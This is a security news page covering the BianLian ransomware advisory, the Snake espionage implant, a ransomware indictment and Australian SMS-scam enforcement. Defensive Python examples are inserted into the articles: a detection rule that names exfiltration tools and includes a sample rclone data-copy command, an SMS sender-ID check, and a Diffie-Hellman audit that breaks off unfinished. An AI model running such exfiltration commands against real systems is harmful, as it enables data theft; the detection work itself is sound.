Security – CIO Tech Asia
Latest News & Happenings In Asia In The Digital Age
Fri, 19 May 2023

#StopRansomware: BianLian Ransomware Group
Fri, 19 May 2023 02:00:55 +0000
http://ciotechasia.com/stopransomware-bianlian-ransomware-group/
BianLian is a cybercriminal group that deals in data extortion using ransomware

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) have released a joint Cybersecurity Advisory to provide information on the BianLian ransomware and data extortion group. This advisory is part of the ongoing #StopRansomware effort, which aims to help organizations defend against ransomware attacks by sharing advisories detailing different ransomware variants and threat actors.

BianLian is a cybercriminal group that develops and deploys ransomware and conducts data extortion. Since June 2022, it has targeted organizations in critical infrastructure sectors in the United States and Australia, as well as the professional services and property development sectors. The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials and uses open-source tools and command-line scripting for reconnaissance and credential harvesting. It exfiltrates victim data using File Transfer Protocol (FTP), Rclone, or Mega, then extorts money by threatening to release the stolen data unless a ransom is paid. Initially the group employed a double-extortion model, encrypting victims’ systems after exfiltrating the data, but it has since shifted primarily to exfiltration-based extortion.

The advisory includes known tactics, techniques, and procedures (TTPs) as well as indicators of compromise (IOCs) associated with the BianLian ransomware and data extortion group. It encourages critical infrastructure organizations, as well as small- and medium-sized organizations, to implement the mitigation recommendations provided in the advisory to reduce the likelihood and impact of BianLian and other ransomware incidents.
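The access-then-exfiltration sequence summarised above (an interactive RDP logon with valid credentials, followed later on the same host by Rclone, FTP or Mega) can be expressed as a simple correlation rule over endpoint telemetry. The Python below is an added example written for this page; it is not code from the joint advisory or from CIO Tech Asia. The flat key=value log format, the sample records, the allowed RDP source and the binary names treated as exfiltration tools are all constructed assumptions for the demonstration, not advisory IOCs.

```python
"""Correlate an interactive RDP logon (Windows Security 4624, logon type 10)
with later execution of an exfiltration tool (4688) on the same host.
Added example for this page, not code from the joint advisory or from
CIO Tech Asia.  Log format, sample records and tool names are constructed."""
import re
from datetime import datetime, timedelta

# Assumption: binaries matching the three channels the advisory names
# (FTP, Rclone, Mega).  Not an advisory IOC list.
EXFIL_TOOLS = {"rclone.exe", "ftp.exe", "megacmd.exe", "megaclient.exe", "megasync.exe"}

# Assumption: hosts from which interactive RDP is expected (e.g. a jump host).
ALLOWED_RDP_SOURCES = {"10.0.5.10"}

# How long after an unexpected RDP logon a tool execution is still paired with it.
CORRELATION_WINDOW = timedelta(hours=6)

# Constructed log lines (documentation address ranges, fictional hosts/users).
SAMPLE_LOGS = r"""
ts=2023-05-18T01:12:09Z event=4624 host=FS01 logon_type=10 user=svc_backup src_ip=203.0.113.44
ts=2023-05-18T01:15:30Z event=4688 host=FS01 user=svc_backup image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c net group /domain"
ts=2023-05-18T02:40:02Z event=4688 host=FS01 user=svc_backup image=C:\Temp\rclone.exe cmdline="rclone.exe copy D:\Finance remote:share --transfers 8"
ts=2023-05-18T03:00:00Z event=4624 host=WS22 logon_type=10 user=jdoe src_ip=10.0.5.10
ts=2023-05-18T03:05:00Z event=4688 host=WS22 user=jdoe image=C:\Windows\System32\ftp.exe cmdline="ftp.exe -s:script.txt"
ts=2023-05-18T09:00:00Z event=4688 host=DB01 user=dba image="C:\Program Files\rclone\rclone.exe" cmdline="rclone.exe sync D:\Data remote:bucket"
"""

# key=value pairs; a value may be double-quoted and then contain spaces.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse(line):
    """Turn one log line into a dict with a parsed UTC timestamp."""
    rec = {key: quoted or bare for key, quoted, bare in KV.findall(line)}
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rec


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(log_text, allowed_rdp_sources=ALLOWED_RDP_SOURCES, window=CORRELATION_WINDOW):
    """Return findings, one per exfiltration-tool execution.

    Severity is 'high' when an RDP logon from a source outside the allow-list
    preceded the tool run on the same host within the window, else 'medium'
    (the tool alone is still worth a look, since it is the advisory's channel).
    """
    events = sorted((parse(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda r: r["ts"])
    unexpected_rdp = {}      # host -> list of RDP logon records from non-allowed sources
    findings = []
    for ev in events:
        host = ev["host"]
        if ev["event"] == "4624" and ev.get("logon_type") == "10":
            if ev["src_ip"] not in allowed_rdp_sources:
                unexpected_rdp.setdefault(host, []).append(ev)
        elif ev["event"] == "4688" and basename(ev["image"]) in EXFIL_TOOLS:
            prior = [r for r in unexpected_rdp.get(host, [])
                     if timedelta(0) <= ev["ts"] - r["ts"] <= window]
            findings.append({
                "host": host,
                "user": ev["user"],
                "tool": basename(ev["image"]),
                "ts": ev["ts"].isoformat(),
                "severity": "high" if prior else "medium",
                "rdp_source": prior[-1]["src_ip"] if prior else None,
            })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOGS):
        print(f"{f['severity']:6} {f['host']:5} {f['user']:10} {f['tool']:12} rdp_from={f['rdp_source']}")
```

On the constructed sample the rule raises one high finding (FS01: RDP from 203.0.113.44, then rclone.exe) and two medium ones (ftp.exe on WS22 after an allowed-source logon, rclone.exe on DB01 with no RDP at all). Tune the allow-list and window to your estate; a jump-host-only RDP policy is what makes the high tier meaningful.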

For more information on BianLian and other ransomware threats, as well as access to no-cost resources, organizations can visit the stopransomware.gov website and review the #StopRansomware advisories.

 

Waton Securities dedicated to fostering employment
Fri, 19 May 2023 00:00:06 +0000
http://ciotechasia.com/waton-securities-dedicated-to-fostering-employment/
With many opportunities for people with disabilities

Waton Securities has formed a partnership with the CanYou Group to establish an online customer service center in Shenzhen, China, aimed at providing job opportunities and employment training support for people with disabilities in the finance industry. The CanYou Group, a comprehensive platform for barrier-free social services, has a track record of achieving stable employment for over 5,000 people with disabilities across China. Waton Securities, a financial technology enterprise, is dedicated to promoting inclusive finance and supporting charitable and public welfare endeavors.

The collaboration between Waton Securities and the CanYou Group reflects the growing need to integrate people with disabilities into the job market, considering the advancements in innovative technologies. Despite the progress made, individuals with disabilities still encounter obstacles in accessing employment resources. Overcoming these challenges requires collective efforts from enterprises and society as a whole.

By combining their resources and expertise, Waton Securities and the CanYou Group aim to facilitate employment opportunities for people with disabilities. Waton Securities remains committed to exploring new models and approaches to support vulnerable groups, leveraging financial technology to create a more equitable world for their customers, employees, and society at large.

 

Brisbane Airport Corporation scales up its security operations
Thu, 18 May 2023 02:00:12 +0000
http://ciotechasia.com/brisbane-airport-corporation-scales-up-its-security-operations/
BNE has valuable assets to protect from increasingly frequent and sophisticated cyberattacks

Brisbane Airport Corporation (BAC) operates Brisbane Airport (BNE), a vital part of Australia’s critical infrastructure that helps employ thousands of Queenslanders and contributes more than $US4 billion to the economy. The third-largest airport in the country by passenger numbers, BNE operates 24/7, connecting people and products with 76 domestic and international destinations.

There are more than 425 businesses at the airport precinct that employ over 24,000 people. BNE is also the largest airport in Australia by land size, covering 2,700 hectares. It’s even classified as a suburb with its own postcode.

All this means BNE has valuable assets to protect from increasingly frequent and sophisticated cyberattacks, including passenger management, staff management, air traffic control and emergency response systems.

Due to significant business disruptions caused by the COVID-19 pandemic, BAC was looking for a partner to manage its cybersecurity-related business risks. In particular, the company wanted to modernise its existing Splunk security information and event management (SIEM) solution into a holistic Managed Security Operations Centre (SOC) that provided end-to-end protection across its technology environment.

Recent amendments to Australia’s Security of Critical Infrastructure Act 2018, as well as aviation security requirements, acted as a catalyst for BAC to implement a managed detection and response (MDR) service to reduce the impact and severity of malicious and progressively more complex cybersecurity incidents. The MDR service also needed to be ‘sovereign’, meaning hosted and managed entirely within Australia.

One of BAC’s main challenges was to tune, triage and respond to cybersecurity alerts.

“The alerts we were receiving weren’t very meaningful. So, we were looking for a solution that improved alert fidelity, helped our cyber team avoid alert fatigue and enabled us to effectively counter cyberthreats,” explains Craig Johnston, ICT Services Manager at BAC.

ParaFlare partnership enables complete cyber coverage

In August 2022, BAC engaged ParaFlare, one of only two partners in Australia to achieve Microsoft’s verified Managed Extended Detection and Response solution status. ParaFlare provides a 24/7 MDR service that leverages Microsoft Sentinel, Defender for Endpoint and Defender for Identity alongside BAC’s existing Splunk SIEM.

Sturt Maclennan, Chief Customer Officer at ParaFlare, says the solution is significantly improving BAC’s detection and response capabilities enhanced by the native integrations of Microsoft’s security stack.

“We’ve got a security platform that gives BAC coverage from their endpoints right through to edge cases in the SIEM, all from a single specialist provider, which is unique,” he says.

Additionally, ParaFlare is providing BAC with curated threat intelligence and advanced threat-hunting services, as well as digital forensics and incident response services.

Its team of threat-hunting specialists conducts monthly exercises that challenge the assumption that the detection strategies already in place remain suitable for the ever-changing cyber threat landscape.

“One of our key differentiators is that we don’t just rely on the tech vendor’s tools for detection – we’ve also created our own library of custom detections,” says Maclennan.

Meanwhile, ParaFlare’s Digital Forensics and Incident Response team, which specialises in investigation and remediation, works alongside its MDR team to ensure a smooth transition and continuity of service in the event of a cybersecurity breach.

Reducing dwell time and generating high fidelity alerts

BAC went live with the SOC in October 2022 following a rapid and comprehensive onboarding process with ParaFlare, resulting in immediate 24/7 eyes on glass.

While it’s still early days, the MDR service has already brought the time between a cyberattack occurring and its detection to within 15 minutes for priority one (critical) cases.

“Being able to receive meaningful alerts gives us a much greater level of end-to-end protection with cyber sovereignty,” says Johnston.

Maclennan says ParaFlare is proud to be partnering with BAC to protect an important part of Australia’s critical infrastructure.

 

Russian national charged with ransomware attacks
Wed, 17 May 2023 03:00:26 +0000
http://ciotechasia.com/russian-national-charged-with-ransomware-attacks/
The attacks targeted law enforcement agencies and other vital sectors

The Justice Department has unsealed two indictments charging a Russian national named Mikhail Pavlovich Matveev with using three different ransomware variants to attack numerous victims in the United States. Matveev, also known as Wazawaka, m1x, Boriselcin, and Uhodiransomwar, allegedly participated in conspiracies to deploy LockBit, Babuk, and Hive ransomware variants and transmitted ransom demands in connection with each. The attacks targeted law enforcement agencies, healthcare organizations, and other sectors, with total ransom demands amounting to as much as $US400 million, and victim ransom payments reaching up to $US200 million.

Matveev’s alleged involvement includes deploying LockBit ransomware against a law enforcement agency in Passaic County, New Jersey, in June 2020, deploying Hive against a nonprofit behavioral healthcare organization in Mercer County, New Jersey, in May 2022, and deploying Babuk against the Metropolitan Police Department in Washington, D.C., in April 2021.

Assistant Attorney General Kenneth A. Polite, Jr. emphasized the need for a coordinated response to such international cybercrimes, and U.S. Attorney Philip R. Sellinger for the District of New Jersey stated the charges serve as a reminder to cybercriminals that they will be brought to justice. U.S. Attorney Matthew M. Graves for the District of Columbia stressed the commitment to prosecute and punish offenses targeting key institutions and individuals.

The LockBit ransomware variant, which Matveev is accused of using, has executed over 1,400 attacks globally, issuing over $US100 million in ransom demands and receiving over $US75 million in ransom payments. Similarly, the Babuk ransomware variant has executed over 65 attacks, issuing over $US49 million in ransom demands and receiving as much as $US13 million in ransom payments. The Hive ransomware group, in which Matveev allegedly participated, has targeted over 1,400 victims worldwide and received as much as $US120 million in ransom payments.

The ransomware attacks generally involved gaining unlawful access to vulnerable computer systems, deploying the ransomware, encrypting and stealing data, sending ransom demands, and negotiating ransom amounts. Failure to pay often resulted in the public release of the victim’s data on data leak sites.

Matveev is charged with conspiring to transmit ransom demands, conspiring to damage protected computers, and intentionally damaging protected computers. If convicted, he could face over 20 years in prison.

The case is being investigated by the FBI Newark Field Office’s Cyber Crimes Task Force, with assistance from various domestic and international partners. The Department of the Treasury’s Office of Foreign Assets Control has also designated Matveev for his role in launching ransomware attacks, and the Department of State is offering a reward of up to $US10 million for information leading to his arrest and/or conviction.

 

Lacework appoints new chief information security officer
Wed, 17 May 2023 01:00:13 +0000
http://ciotechasia.com/lacework-appoints-new-chief-information-security-officer/
Kissner brings a wealth of expertise to Lacework

Lacework, a data-driven cloud security company, has announced the appointment of Lea Kissner as its new Chief Information Security Officer (CISO). Kissner will be responsible for leading the development and implementation of Lacework’s security strategy and programs.

With over 20 years of experience in leading security, privacy, and anti-abuse efforts, Kissner brings a wealth of expertise to Lacework. They have previously served as CISO at Twitter, Chief Privacy Officer at Humu, and Global Lead of Privacy Technology at Google. Kissner also worked as a Security and Privacy consultant for Zoom, addressing security concerns during the surge in usage amid the COVID-19 pandemic.

Kissner’s role as CISO at Lacework aligns with the company’s expansion in the cloud security market. Lacework has been growing its leadership team, with recent appointments including Andrew Casey as CFO and Meagen Eisenberg as CMO.

Jay Parikh, CEO of Lacework, expressed confidence in Kissner’s ability to understand the challenges faced by modern CISOs and the value they bring to organizations. Kissner’s experience will help Lacework deliver a world-class cloud security platform and serve customer CISOs effectively. The company aims to secure the cloud as more enterprises expand their cloud environments.

Kissner shared their excitement about joining Lacework and contributing to the mission of securing the cloud. Their passion for building respectful and secure products aligns with Lacework’s data-driven approach to cloud security, which enables customers to leverage the benefits of the cloud while ensuring robust protection.

 

Establishing a National anti-scam centre
Tue, 16 May 2023 01:00:19 +0000
http://ciotechasia.com/establishing-a-national-anti-scam-centre/
ACCC welcomes funding

The Australian Competition and Consumer Commission (ACCC) has expressed its support for the establishment of the National Anti-Scam Centre (NASC) by the Australian Government. The recently announced budget allocated $US58 million to the ACCC for the setup of the NASC over the next two years.

The funding will be used to develop the necessary technology infrastructure for high-frequency data sharing with various agencies, law enforcement, and the private sector. The goal is to make Australia a more difficult target for scammers. The NASC will bring together expertise and resources to disrupt scammers’ contact with Australians, raise consumer awareness about avoiding scams, and connect scam victims with appropriate services.

By sharing scam reports and implementing other initiatives, the NASC will provide valuable insights to the finance, telecommunications, and digital platforms sectors, enabling them to take timely and effective measures to prevent scams. The NASC will be phased in from July 1, 2023, with the development of data-sharing technology taking place over the next three years.

Additionally, the NASC will establish fusion cells to coordinate efforts between the government and the private sector to combat specific scam activities more effectively. This enhanced coordination and focus will help target anti-scam activities and reduce losses to scams.

During its initial year of operation, the NASC will collaborate closely with the Australian Securities and Investments Commission (ASIC) to deliver a scam website takedown service and support the Australian Communications and Media Authority (ACMA) in combating telecommunications scams.

The ACCC welcomes the government’s commitment to introducing an SMS Sender ID register, similar to Singapore’s, which will aid in disrupting impersonation scams and help consumers verify the authenticity of text messages.

While these steps are positive in the fight against scams, the ACCC emphasizes the need for effective cross-industry standards to prevent scammers from exploiting weak links. The ACCC has been consulting on the future work of the NASC since receiving seed funding in October 2022, with the aim of better protecting consumers from scams through increased coordination across government, finance and telecommunications sectors, and digital platforms.

 

Telcos breached for allowing SMS scams
Sun, 14 May 2023 23:00:22 +0000
http://ciotechasia.com/telcos-breached-for-allowing-sms-scams/
ACMA investigations found three telco providers in breach

The Australian Communications and Media Authority (ACMA) has taken action against a number of telcos after compliance failures were used by scammers to send SMS road toll, Medicare and Australia Post impersonation scams to consumers.

ACMA investigations found Sinch Australia Pty Ltd (Sinch), Infobip Information Technology Pty Ltd (Infobip) and Phone Card Selector Pty Ltd (Phone Card) allowed SMS to be sent using text-based sender IDs without sufficient checks to ensure they were being used legitimately.

The ACMA found Infobip allowed 103,146 non-compliant SMS to be sent, which included scams impersonating well-known Australian road toll companies. Sinch allowed 14,291 non-compliant SMS, which included Medicare and Australia Post impersonation scams.

Phone Card was also found to have inadequate systems in place to comply with the rules, however there is no evidence that scammers exploited the opportunities it created.

Text-based sender IDs can be used by scammers to pose as legitimate organisations such as government agencies, banks, and road toll companies. Under the Reducing Scam Calls and Scam SMS Code, Australian telcos must obtain evidence from customers that they have a legitimate reason to use text-based sender IDs (such as business names) in SMS.
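The control described above amounts to a gate in front of the aggregator’s send path: a numeric originator passes, an alphanumeric sender ID is only honoured for a customer who has registered it and whose evidence of legitimate use has been checked, and a sender ID that merely looks like a protected brand is refused unless the evidence covers that brand. The Python below is an added example written for this page; it is not the text of the Reducing Scam Calls and Scam SMS Code and not any telco’s system. The registration records, brand list, look-alike folding and the 11-character alphanumeric limit applied are assumptions made for the illustration.

```python
"""Sender-ID gate for an SMS aggregator, modelled on the obligation to hold
evidence of a legitimate reason before an alphanumeric sender ID is used.
Added example for this page; not the Code's text and not any telco's
implementation.  Registrations, brands and folding rules are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Registration:
    customer_id: str
    sender_id: str
    evidence_verified: bool                      # business/authorisation evidence checked by a reviewer
    authorised_brands: frozenset = frozenset()   # normalised brand names the evidence covers


# Brands of the kind impersonated in the ACMA cases; the list itself is
# constructed for the example, not taken from the regulator.
PROTECTED_BRANDS = {"linkt", "medicare", "auspost", "australiapost"}

NUMERIC_ID = re.compile(r"^\+?\d{3,15}$")
ALNUM_ID = re.compile(r"^[A-Za-z0-9 ]{1,11}$")   # assumption: 11-char alphanumeric originator limit

# Digit-for-letter substitutions scammers use to dodge naive string matches.
LOOKALIKES = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t", "8": "b"})


def normalise(text):
    """Fold case, digit look-alikes and punctuation: 'Aus-P0st' -> 'auspost'."""
    return re.sub(r"[^a-z]", "", text.lower().translate(LOOKALIKES))


def authorise(customer_id, sender_id, registrations):
    """Decide one send request; returns (allowed, reason)."""
    if NUMERIC_ID.match(sender_id):
        return True, "numeric sender id"
    if not ALNUM_ID.match(sender_id):
        return False, "malformed sender id"
    reg = next((r for r in registrations
                if r.customer_id == customer_id and r.sender_id.lower() == sender_id.lower()), None)
    if reg is None:
        return False, "no registration for this customer and sender id"
    if not reg.evidence_verified:
        return False, "registration exists but evidence not yet verified"
    brand = normalise(sender_id)
    if brand in PROTECTED_BRANDS and brand not in reg.authorised_brands:
        return False, "sender id resembles a protected brand the evidence does not cover"
    return True, "verified registration"


# Constructed registrations: a toll operator with evidence for its own brand,
# a verified but unrelated business trying a look-alike, and a pending one.
REGISTRATIONS = [
    Registration("toll-co", "Linkt", True, frozenset({"linkt"})),
    Registration("acme", "L1nkt", True),
    Registration("gov-dept", "MyGov", False),
]


def screen(requests, registrations=REGISTRATIONS):
    """Apply the gate to a batch of (customer_id, sender_id) send requests."""
    return {(c, s): authorise(c, s, registrations) for c, s in requests}


if __name__ == "__main__":
    batch = [("toll-co", "Linkt"), ("acme", "L1nkt"), ("acme", "Linkt"),
             ("gov-dept", "MyGov"), ("anyone", "+61400000000")]
    for (c, s), (ok, why) in screen(batch).items():
        print(f"{'ALLOW' if ok else 'BLOCK':5} {c:9} {s:13} {why}")
```

The look-alike check is deliberately the last step: a scammer who gets through registration with a genuine business name still cannot send as “L1nkt”, because the evidence on file does not cover that brand. A production gate would also rate-limit and alert on repeated blocked attempts, which is where the “no evidence scammers exploited it” finding against Phone Card would have been visible.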

ACMA Chair Nerida O’Loughlin said the investigations showed scammers will readily take advantage of vulnerabilities created by telcos.

“While there is no suggestion the telcos were involved in scam activity themselves, scammers have used their failures to prey on Australians. This wouldn’t have happened if the companies had adequate processes in place and complied with the rules,” she said.

“Scams that impersonate reputable organisations can be particularly hard for consumers to recognise and there’s no telling how much damage could have been done as a result of these scam texts.”

The ACMA has given Sinch and Infobip formal directions to comply with the obligations, the strongest enforcement action available for code breaches. Phone Card has been given a formal warning.

Combating SMS and identity theft phone scams is an ACMA compliance priority and telcos may face penalties of up to $US250,000 for breaching ACMA directions to comply with the code.

The ACMA has also welcomed the Federal Government’s announcement that the agency will develop an SMS sender ID register to help prevent offshore scammers impersonating trusted brands and government agencies.

“This initiative will help close a key vulnerability used by scammers. The ACMA looks forward to working with industry and trusted brands as we implement this new protection,” Ms O’Loughlin said.

 

ACSC issues joint Advisory on Russian ‘Snake’ Cyber Espionage Tool
Wed, 10 May 2023 02:00:38 +0000
http://ciotechasia.com/acsc-issues-joint-advisory-on-russian-snake-cyber-espionage-tool/
Tool used by Russia’s Federal Security Service

The Australian Cyber Security Centre has released a Joint Cybersecurity Advisory with its international partners on the Snake implant. The Snake implant is a sophisticated cyber espionage tool designed and used by Center 16 of Russia’s Federal Security Service for long-term intelligence collection on sensitive targets.

The Australian Cyber Security Centre has identified Snake infrastructure in over 50 countries; its targeting is purposeful and tactical, designed to collect intelligence from high-priority targets, such as government networks, research facilities, and journalists.

This Cybersecurity Advisory provides background on Snake’s attribution and detailed descriptions of the implant’s host architecture and network communications. The technical information and mitigation recommendations it contains are designed to assist network defenders in detecting Snake and associated activity.

To conduct operations using this tool, the FSB created a covert peer-to-peer (P2P) network of numerous Snake-infected computers worldwide. Many systems in this P2P network serve as relay nodes that route disguised operational traffic to and from Snake implants on the FSB’s ultimate targets.

Snake’s custom communications protocols employ encryption and fragmentation for confidentiality and are designed to hamper detection and collection efforts. We have identified Snake infrastructure in over 50 countries across North America, South America, Europe, Africa, Asia, and Australia, including the United States and Russia. Although Snake uses infrastructure across all industries, its targeting is purposeful and tactical.

Globally, the FSB has used Snake to collect sensitive intelligence from high-priority targets, such as government networks, research facilities, and journalists.

As one example, FSB actors used Snake to access and exfiltrate sensitive international relations documents and other diplomatic communications from a victim in a North Atlantic Treaty Organization (NATO) country.

The FSB has victimised industries within the United States, including education, small businesses, media organisations, and critical infrastructure sectors, including government facilities, financial services, critical manufacturing, and communications.

This Cybersecurity Advisory (CSA) provides background on Snake’s attribution to the FSB and detailed technical descriptions of the implant’s host architecture and network communications. This CSA also addresses a recent Snake variant that has not yet been widely disclosed.

The technical information and mitigation recommendations in this CSA are provided to assist network defenders in detecting Snake and associated activity.

For more information on FSB and Russian state-sponsored cyber activity, please see the joint advisory Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure and CISA’s Russia Cyber Threat Overview and Advisories webpage.

Introduction

What is Snake?

We consider Snake the most sophisticated cyber espionage tool in the FSB’s arsenal.

The sophistication of Snake stems from three principal areas. First, Snake employs means to achieve a rare level of stealth in its host components and network communications. Second, Snake’s internal technical architecture easily incorporates new or replacement components.

This design also facilitates the development and interoperability of Snake instances running on different host operating systems. We have observed interoperable Snake implants for Windows, macOS, and Linux operating systems. Lastly, Snake demonstrates careful software engineering design and implementation, with the implant containing surprisingly few bugs given its complexity.

Following open-source reporting by cybersecurity and threat intelligence companies on Snake tactics, techniques, and procedures (TTPs), the FSB implemented new techniques to evade detection. The modifications to the implant enhanced challenges in identifying and collecting Snake and related artifacts, directly hampering detection from both host- and network-based defensive tools.

The effectiveness of this type of cyber espionage implant depends entirely on its long-term stealth since the objective of an extended espionage operation involves remaining on the target for months or years to provide consistent access to important intelligence. The uniquely sophisticated aspects of Snake represent a significant effort by the FSB over many years to enable this type of covert access.

The FSB began developing Snake as “Uroburos” in late 2003. Development of the initial versions of the implant appeared to be completed around early 2004, with cyber operations first conducted using the implant shortly after that.

The name Uroburos is appropriate, as the FSB cycled it through nearly constant stages of upgrade and redevelopment, even after public disclosures, instead of abandoning it. The name appears throughout early versions of the code, and the FSB developers also left other unique strings, including “Ur0bUr()sGoTyOu#”, which have publicly returned to haunt them.

Unique features in early versions of Uroburos included a low-resolution image of a portion of a historical illustration of an Uroboros by the German philosopher and theologian Jakob Böhme. One approach to a tertiary backdoor used this image as the key. The same image had also been embedded in other Snake-related components. The image, blown up to a higher resolution, is shown at right.

In addition, early FSB developers of the Snake implant left portions of unique code throughout the implant, which revealed inside jokes, personal interests, and taunts directed at security researchers. For instance, the “Ur0bUr()sGoTyOu#” string referenced above was replaced with “gLASs D1cK” in 2014 following some of the public cybersecurity reporting.

Snake operations have been attributed to a known unit within Center 16 of the FSB. This unit more broadly operates the numerous elements of the Turla[2] toolset and has subunits spread throughout Russia, reflecting historical KGB signals intelligence operations in the Soviet Union.

Snake has been a core component of this unit’s operations for almost as long as Center 16 has been part of the FSB.[3] The extensive influence of Snake across the Turla toolset demonstrates its impact on practically every aspect of the unit’s modern era of cyber operations. Daily operations using Snake have been carried out from an FSB facility in Ryazan, Russia, with an increase in Snake activity during FSB working hours in Ryazan, approximately 7:00 AM to 8:00 PM, Moscow Standard Time (GMT+3).

The leading developers were Ryazan-based FSB officers known by monikers included in the code of some versions of Snake. In addition to developing Snake, Ryazan-based FSB officers used it to conduct worldwide operations; these operations differed from others launched from Moscow or other FSB sites based on infrastructure and techniques. While the development and re-tooling of Snake have historically been done by Ryazan-based FSB officers, Snake operations were also launched from an FSB Center 16-occupied building in Moscow.

According to the ACSC, the investigations have identified examples of FSB operators using Snake to its full potential and FSB operators who appeared unfamiliar with Snake’s more advanced capabilities. These observations illustrate the difficulty in using such an advanced toolset across the various geographically dispersed teams comprising this unit within FSB Center 16.

ACSC has been collectively investigating Snake and Snake-related tools for almost 20 years, and other operations by this unit since the 1990s. During that time, the FSB has used Snake in many different operations. They have demonstrated the value placed in this tool by making numerous adjustments and revisions to keep it viable after repeated public disclosures and other mitigations.

Snake’s code and multiple Snake-related tools have been either a starting point or a key influence factor for a diverse range of other highly prolific implants and operational tools in the Turla family. Most notably, this has included Carbon (aka Cobra)—derived from Snake’s code base—and the similarly Snake-adjacent implant Chinch (currently known in open sources as ComRAT).

ACSC has identified Snake infrastructure in over 50 countries across North America, South America, Europe, Africa, Asia, and Australia, including the United States and Russia. Although Snake leverages infrastructure across all industries, its targeting is purposeful and tactical. For instance, if an infected system did not respond to Snake communications, the FSB actors would strategically re-infect it within days.

Globally, the FSB has used Snake to collect sensitive intelligence from high-priority targets, such as government networks, research facilities, and journalists. As one example, FSB actors used Snake to access and exfiltrate sensitive international relations documents and other diplomatic communications from a victim in a NATO country.

Within the United States, the FSB has victimised industries, including education, small businesses, media organisations, and critical infrastructure sectors, including government facilities, financial services, critical manufacturing, and communications.

Other Tools and TTPs Employed with Snake

The FSB typically deploys Snake to external-facing infrastructure nodes on a network and, from there, uses other tools and TTPs on the internal network to conduct additional exploitation operations.

Upon gaining and cementing ingress into a target network, the FSB typically enumerates the network and works to obtain administrator credentials and access domain controllers. Various mechanisms have been employed to gather user and administrator credentials to expand laterally across the network, including keyloggers, network sniffers, and open-source tools.

Typically, after FSB operators map out a network and obtain administrator credentials for various domains in the network, regular collection operations begin. In most instances with Snake, further heavyweight implants are not deployed; FSB operators instead rely on credentials and lightweight remote-access tools internally within a network. FSB operators sometimes deploy a small remote reverse shell alongside Snake to enable interactive operations.

This triggerable reverse shell, which the FSB has used for around 20 years, can be used as a backup access vector or to maintain a minimal presence in a network and avoid detection while moving laterally.

Snake Architecture

Snake’s architectural design reflects professional software engineering practices. Critical pathways within the implant are stacks of loosely coupled components that implement well-designed interfaces. In addition to facilitating software development and debugging, this construction allows Snake to use multiple components for the same purpose, choosing the specific component based on environmental considerations.

For example, Snake’s custom network communications protocols function as a stack. All implementations use encryption and transport layers, such as Snake’s custom HTTP or raw TCP socket protocol. Each Snake network protocol stack layer solely implements a specified interface for operability with the two adjacent layers.

The encryption layer and underlying transport layer thus function independently, so any custom Snake network protocol can employ an encryption overlay without any change to the encryption layer code.[4] This modularity allows Snake operators to choose the most logical network transport for the given environment without affecting Snake’s other functionality.

When using a compromised HTTP server as part of the Snake P2P network, the operators can ensure that all traffic to this machine follows the Snake custom HTTP protocol and blends effectively with legitimate traffic.

In the context of a compromised machine that legitimately allows secure shell (SSH) connections, Snake can utilise its custom raw TCP socket protocol instead of its custom HTTP protocol. All other layers of the Snake protocol stack, from the immediately adjacent transport encryption layer to the distant command processing layer, can and do remain entirely agnostic to the transport layer as long as it implements its interface correctly.

This architecture also allows the Snake developers to easily substitute a new communications protocol when they believe one has been compromised without necessitating any downstream changes in the code base.

Lastly, this design facilitates the development of fully interoperable Snake implants running on different host operating systems. Snake’s technical sophistication extends from the software architecture to lower-level software implementation.

Original versions of Snake were developed as early as 2003 before many of the modern programming languages and frameworks that facilitate this type of modular development were available. Snake is written entirely in C, which provides significant advantages in low-level control and efficiency but does not provide direct support for objects or interfaces at the language level and provides no assistance with memory management.

The developers of Snake successfully implemented the implant’s complex design in C with very few bugs, including careful avoidance of the common pitfalls associated with null-terminated strings and the mixing of signed and unsigned integers. Additionally, the developers demonstrate an understanding of computer science principles throughout the implant’s implementation.

This includes selecting and correctly coding asymptotically optimal algorithms, designing and utilising efficient custom encoding methodologies that closely resemble common encoding schemes, and securely handling the numerous possible errors associated with systems-level programming.

Capitalising on Mistakes

Although the Snake implant is a highly sophisticated espionage tool, it does not escape human error.

A tool like Snake requires more familiarity and expertise to use correctly, and in several instances Snake operators did not use it effectively. Various mistakes in its development and operation provided us with a foothold into the inner workings of Snake. They were key factors in developing capabilities that have allowed for tracking Snake and manipulating its data.

The FSB used the OpenSSL library to handle its Diffie-Hellman key exchange. The Diffie-Hellman key set created by Snake during the key exchange is not long enough to be secure. The FSB provided the function DH_generate_parameters with a prime length of only 128 bits, which is inadequate for asymmetric key systems.
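A defender's audit of Diffie-Hellman group parameters, added here as an example and not code from the advisory or from Snake: it flags a prime of the size the advisory describes (128 bits) as far below the 2048-bit floor and also checks primality and the safe-prime property. The 128-bit prime is constructed inside the block and stands in for what a DH_generate_parameters(128, ...) call would return; the 2048-bit minimum follows NIST SP 800-57.

```python
# Added example (not advisory or Snake code): audit DH group parameters (p, g).
import random

MIN_DH_PRIME_BITS = 2048  # NIST SP 800-57 Part 1 floor for 112-bit strength

def is_probable_prime(n: int, rounds: int = 24) -> bool:
    """Miller-Rabin with random bases; adequate for an audit script."""
    small = (2, 3, 5, 7, 11, 13)
    if n < 2 or any(n % s == 0 for s in small):
        return n in small
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # a witness of compositeness was found
    return True

def audit_dh_params(p: int, g: int) -> list:
    """Return a list of findings; an empty list means the group passed."""
    findings, bits = [], p.bit_length()
    if bits < MIN_DH_PRIME_BITS:
        # Snake's 128-bit modulus lands here: nowhere near the floor.
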